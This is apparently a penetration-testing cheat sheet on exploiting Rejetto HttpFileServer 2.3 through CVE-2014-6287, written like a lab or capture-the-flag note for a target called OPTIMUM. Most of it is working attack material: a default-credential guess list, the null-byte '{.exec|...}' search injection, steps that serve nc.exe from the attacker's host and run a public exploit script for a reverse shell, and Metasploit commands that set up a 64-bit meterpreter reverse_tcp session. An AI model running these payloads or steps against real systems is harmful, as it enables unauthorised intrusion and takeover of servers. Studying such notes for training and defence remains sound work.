# HttpFileServer (HFS) ## Basics * Webserver designed for publishing and sharing files * Developed by Rejetto ``` http://10.x.x.x .. Port 80 HttpFileServer (HFS 2.3) ``` ## Password Guessing ``` admin:admin admin:password root:password root:root admin:fileserver ``` ## HFS 2.3 Remote Command Execution (RCE) * Vulnerable to remote code execution attacks * Due to a poor regex in the file ParserLib.pas * * Execute arbitrary programs using %00 (null byte) sequence in a search action. * Which terminates the regular expression but not the entire string. * HFS has settings to secure against searching with { } . | ## Explore HFS * Google: HTTPFileServer Exploit * * ``` GET /?search=%00 HTTP/1.1 ..original GET /?search=%00{.exec|ping 10.10.10.14 HTTP/1.1 ..ping GET /?search=%00{.exec|ping 10.10.10.14.} HTTP/1.1 ..better tcpdump -i tun0 ..confirm pings ``` ## Easy Exploit (no msf) ``` searchsploit rejetto vim 39161.py ..fix localip/port cp nc.exe . ..prep payload python -m SimpleHTTPServer 80 ..share http://$MyIP:80/nc.exe ..confirm path python 39161.py ..method python 39171.py 10.x.x.x 80 ..exploit (try 4x) nc -nvlp 4444 ..listen ``` ## Rejetto v2.3 RCE - Metasploit * rejetto\_hfs\_exec * CVE-2014-6287 ``` -------------------- Google httpfileserver vulnerability httpfileserver metasploit httpfileserver CVE Found... "Remote Code Execution", Rejetto, CVE-2014-6287 -------------------- Metasploit > searchsploit HTTPFileServer .. nothing > searchsploit HFS .. Rejetto HTTP v2.3 > msfconsole > search rejetto > use exploit/windows/http/rejetto_hfs_exec > show options > set RHOST $IP > set LHOST $MyIP > set SRVHOST $MyIP > set LPORT 5555 > run ``` ## Meterpreter 64 * Session is 32 bit, but Server is 64 * Set a new Payload ``` > sysinfo Computer: OPTIMUM OS: Windows 2012 R2 Arch: x64 ..64 bit Meterpreter: x86/Windows ..32 bit > background msf> show options msf> set payload windows/x64/meterpreter/reverse_tcp ..new Payload msf> set LPORT 51001 ..new Port msf> run ..connected! ``` ##